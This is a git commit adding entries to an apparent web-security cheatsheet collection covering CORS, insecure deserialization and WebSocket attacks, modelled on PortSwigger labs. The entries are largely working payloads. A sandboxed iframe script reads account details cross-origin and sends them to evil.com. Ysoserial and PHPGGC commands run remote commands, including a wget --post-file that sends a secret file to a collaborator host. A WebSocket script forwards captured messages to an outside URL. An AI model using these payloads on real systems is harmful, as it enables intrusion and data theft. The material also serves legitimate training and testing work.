add websocket, serialization

xanhacks · Dec 13, 2022 · 7e15ee9 · 7e15ee9
1 parent dfa5527
commit 7e15ee9
Show file tree

Hide file tree

Showing 4 changed files with 71 additions and 1 deletion.
diff --git a/docs/web/clientside/05-cors.md b/docs/web/clientside/05-cors.md
@@ -35,6 +35,19 @@ fetch('https://api.cors-null-vulnerable.com/sensitiveContent', {
 "></iframe> 
 ```
 
+```html
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
+    var req = new XMLHttpRequest();
+    req.onload = reqListener;
+    req.open('get','https://example.com/accountDetails',true);
+    req.withCredentials = true;
+    req.send();
+    function reqListener() {
+        location='https://evil.com/log?key='+encodeURIComponent(this.responseText);
+    };
+</script>"></iframe>
+```
+
 HTTP Request headers :
 
 ```

diff --git a/docs/web/deserialization.md b/docs/web/deserialization.md
@@ -0,0 +1,30 @@
+---
+title: Insecure deserialization
+description: Insecure deserialization cheatsheet
+---
+
+# Insecure deserialization
+
+## Definition
+
+**Insecure deserialization** is a type of computer security vulnerability that occurs when untrusted data is used to deserialize (i.e., recreate) an object in a computer system. This can allow an attacker to execute arbitrary code and potentially compromise the security of the system.
+
+## Cheatsheet
+
+Java serialize : `0xACED` or `rO0` (base64)
+Ruby serialize : `\x04\bo:\vUser`
+
+- Modify PHP attribute `O:4:"User":2:{s:8:"username";s:6:"carlos";s:7:"isAdmin";b:0;}` to `b:1`
+- Change data type for low comparaison bypass `0 == "Example string" // true`
+- Replace `avatar` path in your cookie and delete your account, the file will be delete
+- Add `index.php~` to find backup code source
+- Inject another PHP object with magic method (__destruct or __wakekup, ...)
+- `rm /home/carlos/morale.txt` using pre-built Apache Common gadget chain
+- Switch to JDK 11, `java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 -w0 | copy`
+- PHPGGC - `./phpggc Symfony/RCE4 system 'rm /home/carlos/morale.txt'`
+- Ruby https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+- `java -jar ysoserial-all.jar CommonsCollections6 'wget --post-file /home/carlos/secret 9hr1ibjg8nya8uzi0bfs85n4yv4mscg1.oastify.com' | gzip -f | base64 -w0 | copy`
+
+## References
+
+- [PortSwigger - Insecure deserialization](https://portswigger.net/web-security/deserialization)
diff --git a/docs/web/host-header-attack.md b/docs/web/host-header-attack.md
@@ -3,7 +3,7 @@
 
 ## Definition
 
-A **Host header attack** is a type of cyber attack in which an attacker manipulates the Host header of a request in order to trick a web server into thinking the request is coming from a different website. This can allow the attacker to access resources or information that they would not normally have access to, or to perform actions on the targeted website that they would not normally be able to do. The Host header is a field in the HTTP request header that specifies the domain name of the website that the client is trying to access. By modifying this field, an attacker can direct the server to respond to their request as if it were coming from a different website.
+A **Host header attack** is a type of cyber attack in which an attacker **manipulates the Host header of a request in order to trick a web server** into thinking the request is coming from a different website. This can allow the attacker to access resources or information that they would not normally have access to, or to perform actions on the targeted website that they would not normally be able to do. The Host header is a field in the HTTP request header that specifies the domain name of the website that the client is trying to access. By modifying this field, an attacker can direct the server to respond to their request as if it were coming from a different website.
 
 ## Cheatsheet
 

diff --git a/docs/web/websocket.md b/docs/web/websocket.md
@@ -0,0 +1,27 @@
+# Websocket
+
+## Definition
+
+A **WebSocket** is a protocol for bidirectional, full-duplex communication over a single TCP connection. It is a modern, efficient, and secure way for web applications to communicate with each other in real-time. With WebSockets, a web application can send and receive data in real-time without the need for continuous polling, which can reduce latency and improve performance. WebSockets are often used in applications such as online gaming, chat, and real-time data visualization.
+
+## Cheatsheet
+
+- XSS in websocket
+- Exfil WS data
+
+```html
+<script>
+    var ws = new WebSocket('wss://your-websocket-url');
+    ws.onopen = function() {
+        ws.send("READY");
+    };
+    ws.onmessage = function(event) {
+        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
+    };
+</script>
+```
+
+
+## References
+
+- [PortSwigger - Websocket](https://portswigger.net/web-security/websockets/)